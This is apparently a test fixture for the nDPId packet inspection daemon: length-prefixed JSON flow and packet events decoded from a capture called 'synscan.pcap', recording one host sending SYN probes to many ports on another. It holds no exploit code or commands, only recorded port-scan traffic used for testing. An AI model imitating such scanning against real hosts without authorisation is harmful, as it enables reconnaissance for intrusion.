+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1842,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1832,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061172,"flow_last_seen":1278275061172,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061172,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":625,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1842,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1832,"flow_packet_id":1,"flow_last_seen":1278275061172,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061172,"pkt":"ACYLMQczACWzv5HuCABFAAAsQg4AACsG22SsEAAIQA2GNIzSAnHdUoMYAAAAAGACEAAmHgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1843,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1833,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061172,"flow_last_seen":1278275061172,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061172,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2065,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1843,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1833,"flow_packet_id":1,"flow_last_seen":1278275061172,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061172,"pkt":"ACYLMQczACWzv5HuCABFAAAsIHkAADAG9\/msEAAIQA2GNIzSCBHdUoMYAAAAAGACBAAsfgAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1844,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1834,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061206,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32770,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1844,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1834,"flow_packet_id":1,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061206,"pkt":"ACYLMQczACWzv5HuCABFAAAs7ucAACYGM4usEAAIQA2GNIzTgALdU4MZAAAAAGACDACsiQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1845,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1835,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061206,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1845,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1835,"flow_packet_id":1,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061206,"pkt":"ACYLMQczACWzv5HuCABFAAAsKmoAACkG9QisEAAIQA2GNIzTFxfdU4MZAAAAAGACCAAZdQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1846,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1836,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061206,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1494,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1846,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1836,"flow_packet_id":1,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061206,"pkt":"ACYLMQczACWzv5HuCABFAAAsv7wAACcGYbasEAAIQA2GNIzTBdbdU4MZAAAAAGACEAAitgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1847,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1837,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061206,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1847,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1837,"flow_packet_id":1,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061206,"pkt":"ACYLMQczACWzv5HuCABFAAAsookAACUGgOmsEAAIQA2GNIzSC2jdUoMYAAAAAGACCAAlJwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1848,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1838,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061206,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3689,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1848,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1838,"flow_packet_id":1,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061206,"pkt":"ACYLMQczACWzv5HuCABFAAAs3UgAADQGNyqsEAAIQA2GNIzSDmndUoMYAAAAAGACBAAmJgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1849,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1839,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061206,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5678,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1849,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1839,"flow_packet_id":1,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061206,"pkt":"ACYLMQczACWzv5HuCABFAAAsLIAAADcG5PKsEAAIQA2GNIzSFi7dUoMYAAAAAGACEAASYQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1850,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1840,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061206,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2607,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1850,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1840,"flow_packet_id":1,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061206,"pkt":"ACYLMQczACWzv5HuCABFAAAsXFUAACYGxh2sEAAIQA2GNIzSCi\/dUoMYAAAAAGACDAAiYAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1851,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1841,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061206,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1851,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1841,"flow_packet_id":1,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061206,"pkt":"ACYLMQczACWzv5HuCABFAAAsfogAADoGj+qsEAAIQA2GNIzSBwndUoMYAAAAAGACDAAlhgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1852,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1842,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061207,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1852,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1842,"flow_packet_id":1,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061207,"pkt":"ACYLMQczACWzv5HuCABFAAAsn2oAAC4GewisEAAIQA2GNIzSD6HdUoMYAAAAAGACDAAc7gAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1853,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1843,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061207,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32775,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1853,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1843,"flow_packet_id":1,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061207,"pkt":"ACYLMQczACWzv5HuCABFAAAsISAAADgG71KsEAAIQA2GNIzSgAfdUoMYAAAAAGACBAC0hwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1854,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1844,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061207,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1854,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1844,"flow_packet_id":1,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061207,"pkt":"ACYLMQczACWzv5HuCABFAAAsj\/MAADgGgH+sEAAIQA2GNIzSAYXdUoMYAAAAAGACBAAzCgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1855,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1845,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061207,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3372,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1855,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1845,"flow_packet_id":1,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061207,"pkt":"ACYLMQczACWzv5HuCABFAAAsDY0AADEGCeasEAAIQA2GNIzSDSzdUoMYAAAAAGACCAAjYwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1856,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1846,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061207,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":687,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1856,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1846,"flow_packet_id":1,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061207,"pkt":"ACYLMQczACWzv5HuCABFAAAss7AAADcGXcKsEAAIQA2GNIzSAq\/dUoMYAAAAAGACEAAl4AAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1857,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1847,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061207,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1857,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1847,"flow_packet_id":1,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061207,"pkt":"ACYLMQczACWzv5HuCABFAAAsBN0AACkGGpasEAAIQA2GNIzSHvDdUoMYAAAAAGACCAARnwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1858,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1848,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061207,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49160,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1858,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1848,"flow_packet_id":1,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061207,"pkt":"ACYLMQczACWzv5HuCABFAAAsRPEAADIG0YGsEAAIQA2GNIzSwAjdUoMYAAAAAGACDABshgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1859,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1849,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061207,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3013,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1859,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1849,"flow_packet_id":1,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061207,"pkt":"ACYLMQczACWzv5HuCABFAAAsQU0AACwG2yWsEAAIQA2GNIzSC8XdUoMYAAAAAGACBAAoygAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1860,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1850,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061207,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5225,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1860,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1850,"flow_packet_id":1,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061207,"pkt":"ACYLMQczACWzv5HuCABFAAAspwkAACcGemmsEAAIQA2GNIzSFGndUoMYAAAAAGACEAAUJgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1861,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1851,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061207,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2251,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1861,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1851,"flow_packet_id":1,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061207,"pkt":"ACYLMQczACWzv5HuCABFAAAsWZIAADsGs+CsEAAIQA2GNIzSCMvdUoMYAAAAAGACEAAfxAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1862,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1852,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5925,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1862,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1852,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/fkAACkGIXmsEAAIQA2GNIzTFyXdU4MZAAAAAGACCAAZZwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1863,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1853,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1234,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1863,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1853,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAsosMAADgGba+sEAAIQA2GNIzTBNLdU4MZAAAAAGACBAAvugAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1864,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1854,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5915,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1864,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1854,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAsxwIAADEGUHCsEAAIQA2GNIzTFxvdU4MZAAAAAGACCAAZcQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1865,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1855,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1865,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1855,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAsG2YAACoGAw2sEAAIQA2GNIzTG1\/dU4MZAAAAAGACDAARLQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1866,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1856,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27353,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 